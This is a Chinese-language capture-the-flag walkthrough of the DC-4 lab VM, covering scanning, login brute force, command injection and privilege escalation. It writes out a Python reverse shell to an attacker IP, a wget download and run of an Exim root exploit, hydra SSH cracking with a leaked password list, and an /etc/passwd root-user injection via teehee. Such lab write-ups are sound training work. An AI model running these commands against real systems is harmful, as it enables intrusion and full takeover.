dc-4打靶日记

1. nmap扫描

1.1 确定目标ip地址

通过比对未打开靶机时候的ip地址可以确定目标的ip地址，也可以通过MAC address识别出来的机器名称（VMware）进行确定

目标ip地址：192.168.31.224

1.2 扫描目标开放的tcp端口

nmap -sT --min-rate 10000 -p- 192.168.31.224 -oA nmapscan/tcpports

确定目标开放的两个个tcp端口为：

22,80

1.3 扫描目标开放的udp端口

nmap -sU --min-rate 10000 -top-ports 20 192.168.31.224 -oA nmapscan/udpports

虽然确实有蛮多开放的udp端口，但是不到万不得已我们一般不对udp端口进行测试，优先级排后。

1.4 扫描开放tcp端口的详细信息

nmap -sT -sV -sC -O -p22,80 192.168.31.224 -oA nmapscan/tcpports_Details

可获得的信息：

端口22：

​ OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

端口80：

​ nginx 1.15.10

​ Linux 3.2 - 4.9

​ OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

1.5 nmap漏洞扫描

nmap -script=vuln -p22,80 192.168.31.224 -oA nmapscan/vulnscan

可以得到的信息：

可能存在CSRF漏洞：

​ http://192.168.31.224:80/login.php

2. 网页检索

2.1 浏览网页

访问网页192.168.31.224:80就只有一个网页登录窗口

可以考虑尝试sql注入但不限于，稍后再做尝试，看看目录爆破能不能破出什么东西出来

2.2 gubuster目录爆破

gobuster dir -u 192.168.31.224 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

好吧，基本上没扫到什么东西。

2.3 尝试访问存在CSRF的网页

发现其实就是一开始的系统登录界面，还是没啥头绪，现在唯一的头绪就是哪个CSRF漏洞，尝试一下，抓个包看看账号密码传输的方式；

ok，信息get

账号密码传输方式为post；传输格式：username=123&password=456

查了一下CSRF发现用不了，算了，爆破用户名密码看看吧

2.4 burpsuite爆破

抓包进行账户名密码的爆破，仅设置username和password两个payload集合，并通过用户名字典和密码字典进行爆破。

仅筛选成功登录的用户名和密码，可得能够登录的用户名和密码并不止一个(但是其实并不是，后面我发现了，并不是能够登录的用户名和密码有多个，而是只有一个，当一次登录成功后，在同一个浏览器，无论写入什么账户名和密码都能够登录)

最后尝试后得知，真正的用户名和密码是：

username: admin password: happy

3. getshell

3.1 系统探寻

进入系统后，选择List Files然后点击Run后得到以下界面，给出了一段文字，似乎好像是指我们执行了ls -l指令

You have selected: ls -l

尝试抓包看看是否能够更改这个指令，观察命令的传输方式；

根据抓包结果似乎是通过post方式发送的命令，简单尝试以下，因为刚才发送的是ls+-l可以得出一些文件，那么我们将其修改为cat+index.php看看是否能够得到相应的文本

确实得到了相应的index.php文件的内容，那么我们就可以通过命令执行来反弹shell

3.2 反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.221",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c "import pty;pty.spawn('/bin/bash')"

ok成功反弹shell

4. 提权

4.1 命令提权exim

通过命令查询具有root权限可执行的二进制文件

find / -perm -u=s -type f 2>/dev/null

还是看到挺多有用的指令的，我们可以尝试一下，但是挺多都不太管用

可以尝试的指令：passwd、exim4、mount、su

最后还能够用来提权的就是难度系数比较大的exim4，先查看一下版本信息

exim --version

可以获得的信息如下：

版本：4.89

通过使用searchsploit查询得到确实有用于本地提权的方法

Exim 4.87 - 4.91 - Local Privilege Escalation linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) linux/local/47307.rb
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) linux/local/47307.rb

通过命令下载相应的提权脚本到当前目录

searchsploit -m 46996.sh

然后将相应的脚本部署到服务器中，使用已经获得基础shell的目标主机通过wget命令下载该提权脚本进行执行，由于现在攻击机和目标机在同一网段，所以直接通过在攻击机部署apache2服务让目标机下载即可

service apache2 start
cp 46996.sh /var/www/html/

然后再到目标主机通过服务器的ip地址和文件位置下载相应的脚本文件即可。

wget http://192.168.31.221/46996.sh

似乎由于权限不够，不能够再当前目录写入，一般情况下tmp目录都具有相当高的权限，可以尝试到/tmp目录下进行脚本的下载

cd /tmp
wget http://192.168.31.221/46996.sh

成功下载，此时我们再为下载的脚本文件给上可执行权限，再执行即可提权

chmod +x 46996.sh
./46996.sh

提权成功，寻找flag文件

find / -name *flag*

cat /root/flag.txt

ok，该提权完毕，结束！

4.2 寻找信息提权

一般在/home目录下能够找到其他用户的文件夹或者更多信息，也能够从各个文件夹中找到更多信息。本次是在/home/jim下找到了一个备份文件backups，里边有一个密码备份文件，似乎是一个密码字典，可以用来登录，尝试将相应的密码扒下来用hydra爆破ssh，密码文件内容如下：

000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1

hydra -L username.txt -P passwordDict.txt ssh://192.168.31.224 -t 8

host: 192.168.31.224 username: jim password: jibril04

在这个账户里面尝试通过sudo -l和相应的命令尝试提权，但是并没有相应命令可以提权

无法执行sudo -l命令

然后再检索资料，最后再/var/mail发现了来自Charles的邮件，在其中发现了charles的密码^xHhA&hvim0y

username: charles password: ^xHhA&hvim0y

通过命令登录charles账户

su charles

找到了teehee命令可以用来提权，尝试用来提权，进行命令

echo "shell::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su shell
cat /root/flag.txt

5. 总结

1. 信息检索能力很重要，拿到主机shell的时候多去翻翻目录var、home等等目录，找找信息
2. exim4、teehee可以用于提权，多找命令
3. 如何命令执行反弹shell